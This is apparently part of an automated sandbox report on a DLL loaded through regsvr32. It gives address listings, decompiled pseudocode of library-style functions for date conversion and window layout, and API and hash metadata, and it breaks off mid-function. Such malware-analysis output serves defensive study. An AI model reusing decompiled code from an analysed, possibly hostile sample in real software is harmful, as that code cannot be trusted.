                                                                                                            0x100394b5
                                                                                                            0x100394ba
                                                                                                            0x100394be
                                                                                                            0x100394c1
                                                                                                            0x100394c8
                                                                                                            0x100394cb
                                                                                                            0x100394ce
                                                                                                            0x100394d2
                                                                                                            0x100394d5
                                                                                                            0x100394da
                                                                                                            0x100394da
                                                                                                            0x100394ea
                                                                                                            0x100394ef
                                                                                                            0x100394f6
                                                                                                            0x100394fa
                                                                                                            0x10039554
                                                                                                            0x10039554
                                                                                                            0x1003955e
                                                                                                            0x10039565
                                                                                                            0x10039566
                                                                                                            0x100395aa
                                                                                                            0x100395aa
                                                                                                            0x10039762
                                                                                                            0x10039768
                                                                                                            0x10039773
                                                                                                            0x10039773
                                                                                                            0x10039576
                                                                                                            0x1003957b
                                                                                                            0x1003957e
                                                                                                            0x10039587
                                                                                                            0x1003958c
                                                                                                            0x1003959a
                                                                                                            0x1003959c
                                                                                                            0x1003959c
                                                                                                            0x100395a0
                                                                                                            0x100395a7
                                                                                                            0x100395a8
                                                                                                            0x100395bc
                                                                                                            0x100395c4
                                                                                                            0x100395c7
                                                                                                            0x100395db
                                                                                                            0x100395e0
                                                                                                            0x100395e4
                                                                                                            0x100395e7
                                                                                                            0x10039625
                                                                                                            0x10039625
                                                                                                            0x10039628
                                                                                                            0x1003962c
                                                                                                            0x10039631
                                                                                                            0x1003964c
                                                                                                            0x1003964c
                                                                                                            0x10039651
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039657
                                                                                                            0x1003965c
                                                                                                            0x1003972d
                                                                                                            0x10039730
                                                                                                            0x10039757
                                                                                                            0x1003975a
                                                                                                            0x1003975a
                                                                                                            0x10039760
                                                                                                            0x10039760
                                                                                                            0x00000000
                                                                                                            0x10039760
                                                                                                            0x10039732
                                                                                                            0x10039733
                                                                                                            0x1003973d
                                                                                                            0x1003973f
                                                                                                            0x10039744
                                                                                                            0x10039744
                                                                                                            0x00000000
                                                                                                            0x1003973f
                                                                                                            0x10039735
                                                                                                            0x10039738
                                                                                                            0x1003974d
                                                                                                            0x00000000
                                                                                                            0x1003974d
                                                                                                            0x1003973b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1003973b
                                                                                                            0x10039662
                                                                                                            0x10039665
                                                                                                            0x1003966b
                                                                                                            0x10039671
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039677
                                                                                                            0x00000000
                                                                                                            0x1003971a
                                                                                                            0x1003971a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100396f3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039706
                                                                                                            0x10039709
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039711
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100396f8
                                                                                                            0x100396fb
                                                                                                            0x100396fe
                                                                                                            0x10039701
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039716
                                                                                                            0x10039718
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039723
                                                                                                            0x10039724
                                                                                                            0x10039725
                                                                                                            0x10039726
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100396ee
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039677
                                                                                                            0x10039639
                                                                                                            0x1003963c
                                                                                                            0x10039642
                                                                                                            0x10039646
                                                                                                            0x10039647
                                                                                                            0x00000000
                                                                                                            0x10039639
                                                                                                            0x100395e9
                                                                                                            0x100395f0
                                                                                                            0x100395f3
                                                                                                            0x100396b0
                                                                                                            0x100396b1
                                                                                                            0x100396b2
                                                                                                            0x100396b5
                                                                                                            0x100396ba
                                                                                                            0x100396c0
                                                                                                            0x00000000
                                                                                                            0x100396c0
                                                                                                            0x100395fc
                                                                                                            0x1003969b
                                                                                                            0x1003969c
                                                                                                            0x1003969d
                                                                                                            0x100396a0
                                                                                                            0x100396a5
                                                                                                            0x100396a8
                                                                                                            0x100396a8
                                                                                                            0x00000000
                                                                                                            0x100396a8
                                                                                                            0x10039605
                                                                                                            0x1003968c
                                                                                                            0x1003968d
                                                                                                            0x1003968e
                                                                                                            0x10039691
                                                                                                            0x10039696
                                                                                                            0x00000000
                                                                                                            0x10039696
                                                                                                            0x1003960e
                                                                                                            0x1003967e
                                                                                                            0x1003967f
                                                                                                            0x10039680
                                                                                                            0x10039688
                                                                                                            0x10039615
                                                                                                            0x10039615
                                                                                                            0x10039616
                                                                                                            0x10039617
                                                                                                            0x1003961f
                                                                                                            0x10039622
                                                                                                            0x10039622
                                                                                                            0x00000000
                                                                                                            0x1003960e
                                                                                                            0x00000000
                                                                                                            0x100395a8
                                                                                                            0x100394fc
                                                                                                            0x100394fc
                                                                                                            0x10039500
                                                                                                            0x10039507
                                                                                                            0x10039508
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039516
                                                                                                            0x1003951b
                                                                                                            0x1003951e
                                                                                                            0x10039525
                                                                                                            0x1003952a
                                                                                                            0x1003952e
                                                                                                            0x10039535
                                                                                                            0x10039538
                                                                                                            0x1003953c
                                                                                                            0x1003953c
                                                                                                            0x1003953d
                                                                                                            0x10039541
                                                                                                            0x10039542
                                                                                                            0x10039546
                                                                                                            0x10039549
                                                                                                            0x10039551
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 100394B5
                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 100394E0
                                                                                                            • VariantClear.OLEAUT32(0000000C), ref: 1003963C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClearH_prologVariantlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2416264355-0
                                                                                                            • Opcode ID: 01d55cbef57070eba50bc1bacdd47ccffadd2fabc5e95ff73a26932456179a65
                                                                                                            • Instruction ID: 794d22016aebeea8945113baaba77667614d3c7e1eb394332e3a898872445e5b
                                                                                                            • Opcode Fuzzy Hash: 01d55cbef57070eba50bc1bacdd47ccffadd2fabc5e95ff73a26932456179a65
                                                                                                            • Instruction Fuzzy Hash: 8381B13590465AEFCF12CFA9C881A9EBBB5FF05391F208115F854AF291D735EA90CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10018BEF Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E10018BEF(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __edi;
				void* __ebp;
				intOrPtr* _t89;
				void* _t90;
				void* _t101;
				intOrPtr _t112;
				void* _t115;
				signed int _t120;
				signed int _t125;
				intOrPtr _t132;
				intOrPtr _t133;
				void* _t138;
				intOrPtr _t140;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				void* _t159;
				intOrPtr _t162;
				signed int _t164;
				signed int _t165;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				intOrPtr _t174;
				void* _t176;
				intOrPtr _t180;

				_t89 = _a4;
				_v12 = _v12 & 0x00000000;
				_t133 =  *((intOrPtr*)(_t89 + 4));
				_t162 =  *_t89;
				_v24 = _t162;
				_v20 = _t133;
				_t90 = E1001519D(_t162);
				_t174 = _t133;
				_t172 = _t90;
				if(_t174 < 0 || _t174 <= 0 && _t162 < 0) {
					L28:
					return 0;
				} else {
					_t176 = _t133 - 0x1000;
					if(_t176 > 0 || _t176 >= 0 && _t162 > 0) {
						goto L28;
					} else {
						if( *((intOrPtr*)(_t172 + 0x44)) != 0) {
							L9:
							_t173 =  *((intOrPtr*)(_t172 + 0x44));
							L10:
							_t142 = E10013780(_t162, _t133, 0x1e13380, 0) + 0x46;
							_t10 = _t142 + 0x12b; // 0xe5
							asm("cdq");
							_t15 = _t142 - 1; // -71
							_v16 = _t15;
							_v8 = _t142;
							asm("cdq");
							_t164 = 0x64;
							_t165 = 4;
							asm("cdq");
							_t28 = _v16 / _t165 - 0x11; // 0xd4
							asm("cdq");
							_t29 = _t142 - 0x46; // -140
							asm("cdq");
							_t101 = E100122A0(_t29, _v16 % _t165, 0xfffffe93, 0xffffffff);
							asm("sbb edx, ebx");
							_t138 = 0x15180;
							_t168 = _v24 + E100122A0(_t101 - _t10 / 0x190 - _t15 / _t164 + _t28, _v16 % _t165, 0x15180, 0);
							asm("adc [ebp-0x10], edx");
							_t180 = _v20;
							if(_t180 > 0 || _t180 >= 0 && _t168 >= 0) {
								asm("cdq");
								_t143 = 4;
								if(_v8 % _t143 != 0) {
									L19:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										goto L21;
									}
									goto L20;
								}
								asm("cdq");
								_t149 = 0x64;
								_t158 = _v8 % _t149;
								if(_v8 % _t149 != 0) {
									goto L20;
								}
								goto L19;
							} else {
								_t125 = _v16;
								_v8 = _t125;
								_t168 = _t168 + 0x1e13380;
								asm("adc dword [ebp-0x10], 0x0");
								asm("cdq");
								_t150 = 4;
								if(_t125 % _t150 != 0) {
									L15:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										L21:
										 *((intOrPtr*)(_t173 + 0x14)) = _v8;
										 *((intOrPtr*)(_t173 + 0x1c)) = E10013780(_t168, _v20, _t138, 0);
										asm("cdq");
										_t169 = _t168 + E100122A0(_t110, _t158, 0xfffeae80, 0xffffffff);
										asm("adc [ebp-0x10], edx");
										_t159 = 0x1004ce98;
										if(_v12 == 0) {
											_t159 = 0x1004cecc;
										}
										_t112 =  *((intOrPtr*)(_t173 + 0x1c));
										_t146 = 1;
										if( *((intOrPtr*)(_t159 + 4)) >= _t112) {
											L27:
											_t147 = _t146 - 1;
											 *(_t173 + 0x10) = _t147;
											 *((intOrPtr*)(_t173 + 0xc)) = _t112 -  *((intOrPtr*)(_t159 + _t147 * 4));
											_t115 = E10013780( *_a4,  *((intOrPtr*)(_a4 + 4)), _t138, 0);
											_t148 = 7;
											asm("cdq");
											 *(_t173 + 0x18) = (_t115 + 4) % _t148;
											 *((intOrPtr*)(_t173 + 8)) = E10013780(_t169, _v20, 0xe10, 0);
											asm("cdq");
											_t170 = _t169 + E100122A0(_t118, (_t115 + 4) % _t148, 0xfffff1f0, 0xffffffff);
											asm("adc [ebp-0x10], edx");
											_t120 = E10013780(_t170, _v20, 0x3c, 0);
											 *(_t173 + 4) = _t120;
											 *_t173 = _t170 - _t120 * 0x3c;
											 *((intOrPtr*)(_t173 + 0x20)) = 0;
											return _t173;
										} else {
											_t140 = _t112;
											do {
												_t146 = _t146 + 1;
											} while ( *((intOrPtr*)(_t159 + _t146 * 4)) < _t140);
											_t138 = 0x15180;
											goto L27;
										}
									}
									L16:
									_t168 = _t168 + _t138;
									asm("adc dword [ebp-0x10], 0x0");
									L20:
									_v12 = 1;
									goto L21;
								}
								asm("cdq");
								_t152 = 0x64;
								_t158 = _v8 % _t152;
								if(_v8 % _t152 != 0) {
									goto L16;
								}
								goto L15;
							}
						}
						_t132 = E100107B6(0x24);
						 *((intOrPtr*)(_t172 + 0x44)) = _t132;
						if(_t132 != 0) {
							goto L9;
						}
						_t173 = 0x1004f744;
						goto L10;
					}
				}
			}









































                                                                                                            0x10018bf5
                                                                                                            0x10018bf8
                                                                                                            0x10018bfd
                                                                                                            0x10018c02
                                                                                                            0x10018c04
                                                                                                            0x10018c07
                                                                                                            0x10018c0a
                                                                                                            0x10018c0f
                                                                                                            0x10018c11
                                                                                                            0x10018c13
                                                                                                            0x10018e0d
                                                                                                            0x00000000
                                                                                                            0x10018c23
                                                                                                            0x10018c23
                                                                                                            0x10018c29
                                                                                                            0x00000000
                                                                                                            0x10018c39
                                                                                                            0x10018c3d
                                                                                                            0x10018c55
                                                                                                            0x10018c55
                                                                                                            0x10018c58
                                                                                                            0x10018c68
                                                                                                            0x10018c6b
                                                                                                            0x10018c71
                                                                                                            0x10018c7b
                                                                                                            0x10018c7e
                                                                                                            0x10018c81
                                                                                                            0x10018c88
                                                                                                            0x10018c89
                                                                                                            0x10018c8e
                                                                                                            0x10018c9b
                                                                                                            0x10018c9e
                                                                                                            0x10018ca2
                                                                                                            0x10018ca5
                                                                                                            0x10018caa
                                                                                                            0x10018cad
                                                                                                            0x10018cb4
                                                                                                            0x10018cb8
                                                                                                            0x10018cc8
                                                                                                            0x10018cca
                                                                                                            0x10018ccd
                                                                                                            0x10018cd1
                                                                                                            0x10018d21
                                                                                                            0x10018d22
                                                                                                            0x10018d27
                                                                                                            0x10018d36
                                                                                                            0x10018d3e
                                                                                                            0x10018d44
                                                                                                            0x10018d48
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018d48
                                                                                                            0x10018d2e
                                                                                                            0x10018d2f
                                                                                                            0x10018d30
                                                                                                            0x10018d34
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018cd9
                                                                                                            0x10018cd9
                                                                                                            0x10018cdc
                                                                                                            0x10018cdf
                                                                                                            0x10018ce5
                                                                                                            0x10018ceb
                                                                                                            0x10018cec
                                                                                                            0x10018cf1
                                                                                                            0x10018d00
                                                                                                            0x10018d08
                                                                                                            0x10018d0e
                                                                                                            0x10018d12
                                                                                                            0x10018d51
                                                                                                            0x10018d5a
                                                                                                            0x10018d65
                                                                                                            0x10018d68
                                                                                                            0x10018d75
                                                                                                            0x10018d77
                                                                                                            0x10018d7e
                                                                                                            0x10018d83
                                                                                                            0x10018d85
                                                                                                            0x10018d85
                                                                                                            0x10018d8a
                                                                                                            0x10018d8f
                                                                                                            0x10018d93
                                                                                                            0x10018da2
                                                                                                            0x10018da2
                                                                                                            0x10018da3
                                                                                                            0x10018dab
                                                                                                            0x10018db7
                                                                                                            0x10018dc1
                                                                                                            0x10018dc2
                                                                                                            0x10018dd1
                                                                                                            0x10018ddb
                                                                                                            0x10018dde
                                                                                                            0x10018dec
                                                                                                            0x10018dee
                                                                                                            0x10018df7
                                                                                                            0x10018dfc
                                                                                                            0x10018e04
                                                                                                            0x10018e06
                                                                                                            0x00000000
                                                                                                            0x10018d95
                                                                                                            0x10018d95
                                                                                                            0x10018d97
                                                                                                            0x10018d97
                                                                                                            0x10018d98
                                                                                                            0x10018d9d
                                                                                                            0x00000000
                                                                                                            0x10018d9d
                                                                                                            0x10018d93
                                                                                                            0x10018d14
                                                                                                            0x10018d14
                                                                                                            0x10018d16
                                                                                                            0x10018d4a
                                                                                                            0x10018d4a
                                                                                                            0x00000000
                                                                                                            0x10018d4a
                                                                                                            0x10018cf8
                                                                                                            0x10018cf9
                                                                                                            0x10018cfa
                                                                                                            0x10018cfe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018cfe
                                                                                                            0x10018cd1
                                                                                                            0x10018c41
                                                                                                            0x10018c49
                                                                                                            0x10018c4c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018c4e
                                                                                                            0x00000000
                                                                                                            0x10018c4e
                                                                                                            0x10018c29

                                                                                                            APIs
                                                                                                              • Part of subcall function 1001519D: GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                                                              • Part of subcall function 1001519D: FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                                                              • Part of subcall function 1001519D: FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                                                              • Part of subcall function 1001519D: GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                                                              • Part of subcall function 1001519D: SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018D5E
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DB7
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DD4
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DF7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 223281555-0
                                                                                                            • Opcode ID: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                                                            • Instruction ID: 428b4c813f629567aa63a678bca7b6061bdb39fa1b2836493da5e96e2c7cad82
                                                                                                            • Opcode Fuzzy Hash: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                                                            • Instruction Fuzzy Hash: 3361B1B6A00306ABD714DEA9CC41BAEB3F6EB84354F25452DF5119B2C1D7B5EB808B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002D821 Relevance: 7.7, APIs: 5, Instructions: 204windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 59%
                                                                                                            			E1002D821(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				signed char _t75;
				signed int _t80;
				signed int _t81;
				signed int _t85;
				signed int _t87;
				void* _t95;
				intOrPtr _t125;
				intOrPtr _t133;
				void* _t147;
				void* _t151;
				intOrPtr _t155;
				void* _t158;
				void* _t160;

				_t147 = __edx;
				_t158 = _t160 - 0xb0;
				_t70 =  *0x1004c470; // 0xf3933a06
				_t155 =  *((intOrPtr*)(_t158 + 0xb8));
				 *((intOrPtr*)(_t158 + 0xac)) = _t70;
				_t125 = __ecx;
				_t72 = GetWindowRect( *(_t155 + 0x1c), _t158 - 0x80);
				if( *((intOrPtr*)(_t155 + 0x88)) != _t125 ||  *(_t158 + 0xbc) != 0 && EqualRect(_t158 - 0x80,  *(_t158 + 0xbc)) == 0) {
					if( *((intOrPtr*)(_t125 + 0x90)) != 0 && ( *(_t155 + 0x80) & 0x00000040) != 0) {
						 *(_t125 + 0x7c) =  *(_t125 + 0x7c) | 0x00000040;
					}
					 *(_t125 + 0x7c) =  *(_t125 + 0x7c) & 0xfffffff9;
					_t75 =  *(_t155 + 0x7c) & 0x00000006 |  *(_t125 + 0x7c);
					 *(_t125 + 0x7c) = _t75;
					if((_t75 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t158 - 0x58);
						E1002095F(_t155);
						E10029B23(_t155,  *((intOrPtr*)(_t125 + 0x1c)), _t158 - 0x58);
					}
					_t80 = ( *(_t155 + 0x7c) ^  *(_t125 + 0x7c)) & 0x0000f000 ^  *(_t155 + 0x7c) | 0x00000f00;
					if( *((intOrPtr*)(_t125 + 0x90)) == 0) {
						_t81 = _t80 & 0xfffffffe;
					} else {
						_t81 = _t80 | 0x00000001;
					}
					E100383D0(_t155, _t81);
					 *((intOrPtr*)(_t158 - 0x6c)) = 0;
					if( *((intOrPtr*)(_t155 + 0x88)) != _t125 && IsWindowVisible( *(_t155 + 0x1c)) != 0) {
						E100204FE(_t155, 0, 0, 0, 0, 0, 0x97);
						 *((intOrPtr*)(_t158 - 0x6c)) = 1;
					}
					 *(_t158 - 0x70) =  *(_t158 - 0x70) | 0xffffffff;
					if( *(_t158 + 0xbc) == 0) {
						_t57 = _t125 + 0x94; // 0x94
						_t150 = _t57;
						E1001E2BE(_t57, _t158,  *((intOrPtr*)(_t57 + 8)), _t155);
						E1001E2BE(_t150, _t158,  *((intOrPtr*)(_t150 + 8)), 0);
						_t85 =  *0x1004efa4; // 0x2
						_t151 = 0;
						_t87 =  *0x1004efa0; // 0x2
						E100204FE(_t155, 0,  ~_t87,  ~_t85, 0, 0, 0x115);
					} else {
						CopyRect(_t158 - 0x68,  *(_t158 + 0xbc));
						E10028E5A(_t125, _t158 - 0x68);
						asm("cdq");
						asm("cdq");
						_push(( *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)) - _t147 >> 1) +  *((intOrPtr*)(_t158 - 0x64)));
						_push(( *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68) - _t147 >> 1) +  *(_t158 - 0x68));
						_push( *((intOrPtr*)(_t158 + 0xb8)));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t158 - 0x70) = E1002CE2A(_t125);
						E100204FE( *((intOrPtr*)(_t158 + 0xb8)), 0,  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x64)),  *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)), 0x114);
						_t155 =  *((intOrPtr*)(_t158 + 0xb8));
						_t151 = 0;
					}
					if(E100220EE(_t158, GetParent( *(_t155 + 0x1c))) != _t125) {
						E1000870E(_t155, _t125);
					}
					_t133 =  *((intOrPtr*)(_t155 + 0x88));
					if(_t133 != _t125) {
						if(_t133 != _t151) {
							if( *((intOrPtr*)(_t125 + 0x90)) == _t151 ||  *((intOrPtr*)(_t133 + 0x90)) != _t151) {
								_t95 = 0;
							} else {
								_t95 = 1;
							}
							_push(_t95);
							_push(0xffffffff);
							goto L27;
						}
					} else {
						_push(_t151);
						_push( *(_t158 - 0x70));
						L27:
						_push(_t155);
						E1002D1B2(_t133);
					}
					 *((intOrPtr*)(_t155 + 0x88)) = _t125;
					if( *((intOrPtr*)(_t158 - 0x6c)) != _t151) {
						E100204FE(_t155, _t151, _t151, _t151, _t151, _t151, 0x57);
					}
					E1002D14B(_t125, _t125, _t158, _t155);
					 *(E100314D8(_t125) + 0xcc) =  *(_t72 + 0xcc) | 0x0000000c;
				}
				return E100117AE(_t72,  *((intOrPtr*)(_t158 + 0xac)));
			}




















                                                                                                            0x1002d821
                                                                                                            0x1002d822
                                                                                                            0x1002d82f
                                                                                                            0x1002d836
                                                                                                            0x1002d83c
                                                                                                            0x1002d84a
                                                                                                            0x1002d84c
                                                                                                            0x1002d85a
                                                                                                            0x1002d886
                                                                                                            0x1002d891
                                                                                                            0x1002d891
                                                                                                            0x1002d895
                                                                                                            0x1002d8a2
                                                                                                            0x1002d8a6
                                                                                                            0x1002d8a9
                                                                                                            0x1002d8ab
                                                                                                            0x1002d8b3
                                                                                                            0x1002d8b6
                                                                                                            0x1002d8c2
                                                                                                            0x1002d8c2
                                                                                                            0x1002d8d5
                                                                                                            0x1002d8e0
                                                                                                            0x1002d8e7
                                                                                                            0x1002d8e2
                                                                                                            0x1002d8e2
                                                                                                            0x1002d8e2
                                                                                                            0x1002d8ed
                                                                                                            0x1002d8f8
                                                                                                            0x1002d8fb
                                                                                                            0x1002d916
                                                                                                            0x1002d91b
                                                                                                            0x1002d91b
                                                                                                            0x1002d922
                                                                                                            0x1002d92c
                                                                                                            0x1002d9b9
                                                                                                            0x1002d9b9
                                                                                                            0x1002d9c5
                                                                                                            0x1002d9d1
                                                                                                            0x1002d9d6
                                                                                                            0x1002d9e0
                                                                                                            0x1002d9e7
                                                                                                            0x1002d9f2
                                                                                                            0x1002d932
                                                                                                            0x1002d93c
                                                                                                            0x1002d948
                                                                                                            0x1002d956
                                                                                                            0x1002d966
                                                                                                            0x1002d96e
                                                                                                            0x1002d96f
                                                                                                            0x1002d975
                                                                                                            0x1002d97b
                                                                                                            0x1002d97c
                                                                                                            0x1002d97d
                                                                                                            0x1002d980
                                                                                                            0x1002d98c
                                                                                                            0x1002d9aa
                                                                                                            0x1002d9af
                                                                                                            0x1002d9b5
                                                                                                            0x1002d9b5
                                                                                                            0x1002da08
                                                                                                            0x1002da0d
                                                                                                            0x1002da0d
                                                                                                            0x1002da12
                                                                                                            0x1002da1a
                                                                                                            0x1002da24
                                                                                                            0x1002da2c
                                                                                                            0x1002da3b
                                                                                                            0x1002da36
                                                                                                            0x1002da38
                                                                                                            0x1002da38
                                                                                                            0x1002da3d
                                                                                                            0x1002da3e
                                                                                                            0x00000000
                                                                                                            0x1002da3e
                                                                                                            0x1002da1c
                                                                                                            0x1002da1c
                                                                                                            0x1002da1d
                                                                                                            0x1002da40
                                                                                                            0x1002da40
                                                                                                            0x1002da41
                                                                                                            0x1002da41
                                                                                                            0x1002da49
                                                                                                            0x1002da4f
                                                                                                            0x1002da5a
                                                                                                            0x1002da5a
                                                                                                            0x1002da62
                                                                                                            0x1002da6e
                                                                                                            0x1002da6e
                                                                                                            0x1002da8a

                                                                                                            APIs
                                                                                                            • GetWindowRect.USER32 ref: 1002D84C
                                                                                                            • EqualRect.USER32 ref: 1002D872
                                                                                                            • IsWindowVisible.USER32(?), ref: 1002D900
                                                                                                            • CopyRect.USER32 ref: 1002D93C
                                                                                                            • GetParent.USER32(?), ref: 1002D9FA
                                                                                                              • Part of subcall function 1000870E: SetParent.USER32(?,00000000), ref: 1000871D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$ParentWindow$CopyEqualVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 545338366-0
                                                                                                            • Opcode ID: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                                                            • Instruction ID: 33a625b915a49ab54241972194f75ebdbdf7b4231d1b3c0eb1f8f86e0de30ee8
                                                                                                            • Opcode Fuzzy Hash: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                                                            • Instruction Fuzzy Hash: 86619A71600649AFDB61EFA8DC85FAE77FAEB44300F50812AE959DB196CB30AC45CB11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10014691 Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10014691(signed int _a4) {
				intOrPtr _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				signed int _t51;
				void* _t52;
				signed int _t53;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				signed int* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				signed int _t64;
				signed int* _t66;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				signed int _t70;
				void* _t71;
				intOrPtr _t73;
				void _t74;
				signed int _t75;
				signed int _t76;
				short* _t77;
				void* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;

